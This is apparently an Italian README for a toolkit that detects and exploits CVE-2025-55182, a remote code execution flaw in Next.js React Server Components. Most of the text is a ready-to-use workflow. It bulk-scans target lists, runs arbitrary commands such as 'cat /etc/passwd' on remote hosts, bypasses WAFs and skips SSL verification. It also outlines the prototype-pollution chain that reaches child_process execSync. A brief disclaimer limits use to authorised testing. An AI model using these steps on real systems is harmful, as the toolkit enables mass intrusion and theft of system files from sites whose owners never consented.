
Uno strumento completo di ricerca sulla sicurezza per testare la vulnerabilità di Remote Code Execution nei React Server Components di Next.js (CVE-2025-55182).
Questo toolkit fornisce capacità automatizzate di rilevamento ed exploitation per CVE-2025-55182, una vulnerabilità RCE critica che colpisce le applicazioni Next.js che utilizzano React Server Components. Il toolkit è composto da tre componenti integrati:
requestspip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
Il modo più rapido per scansionare ed eseguire l'exploit sui target:
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt
# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"
Identifica le applicazioni Next.js senza eseguire exploit:
python3 NextApp.py targets.txt
File di output:
confirmed_nextjs_targets.txt - Tutte le applicazioni Next.js rilevatehigh_confidence_nextjs_targets.txt - Solo rilevamenti ad alta confidenzaTesta singoli target:
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"
# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt
# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
Argomenti:
targets_file - File di testo contenente gli URL dei target (uno per riga)./exploit.sh [OPTIONS]
Opzioni:
./auto_exploit.sh [OPTIONS]
Opzioni:
Generato da NextApp.py - contiene tutti gli URL identificati come applicazioni Next.js.
Generato da NextApp.py - contiene solo i rilevamenti Next.js ad alta confidenza (punteggio di confidenza 100+).
Generato da auto_exploit.sh - report di exploitation completo che include:
Lo scanner utilizza molteplici tecniche di rilevamento con un sistema di punteggio di confidenza:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 punti)_next/* (25-75 punti in base alla quantità)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTSoglie di Confidenza:
L'exploit sfrutta una catena di prototype pollution nei React Server Components di Next.js:
__proto__ tramite deserializzazione JSON_response._prefixprocess.mainModule.require('child_process').execSync()X-Action-RedirectIl toolkit include capacità integrate di bypass WAF:
Abilita con i flag -w o --waf-bypass.
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Check results
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Step 1: Detect and filter
python3 NextApp.py targets.txt
# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Gli utenti devono:
L'accesso non autorizzato ai sistemi informatici è illegale. Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.
Ringraziamenti ai ricercatori di sicurezza che hanno scoperto e divulgato questa vulnerabilità:
I contributi sono benvenuti! Per favore:
Per problemi, domande o richieste di funzionalità, apri una issue su GitHub.
Questo progetto è fornito a scopo educativo e per test di sicurezza autorizzati. Usalo in modo responsabile ed etico.
| Option | Descrizione | Predefinito |
|---|
-d, --domain | Dominio/URL del target | http://localhost:3000 |
-f, --file | File con elenco dei target | - |
-c, --command | Comando da eseguire | id |
-w, --waf-bypass | Abilita bypass WAF | Disabilitato |
--waf-size SIZE | Dimensione dati bypass WAF (KB) | 128 |
--timeout SECONDS | Timeout richiesta | 15 |
-k, --insecure | Salta verifica SSL | Disabilitato |
--user-agent AGENT | User-Agent personalizzato | Mozilla/5.0... |
-h, --help | Mostra messaggio di aiuto | - |
| Option | Descrizione | Predefinito |
|---|
-i, --input FILE | File di input dei target | confirmed_nextjs_targets.txt |
-o, --output FILE | File di output dei risultati | exploit_results.txt |
-c, --command CMD | Comando da eseguire | id |
-w, --waf-bypass | Abilita bypass WAF | Disabilitato |
--waf-size SIZE | Dimensione bypass WAF (KB) | 128 |
--timeout SECONDS | Timeout richiesta | 15 |
-k, --insecure | Salta verifica SSL | Disabilitato |
--delay SECONDS | Ritardo tra le richieste | 2 |
-s, --scan | Auto-scan per Next.js prima dell'exploit | Disabilitato |
-h, --help | Mostra messaggio di aiuto | - |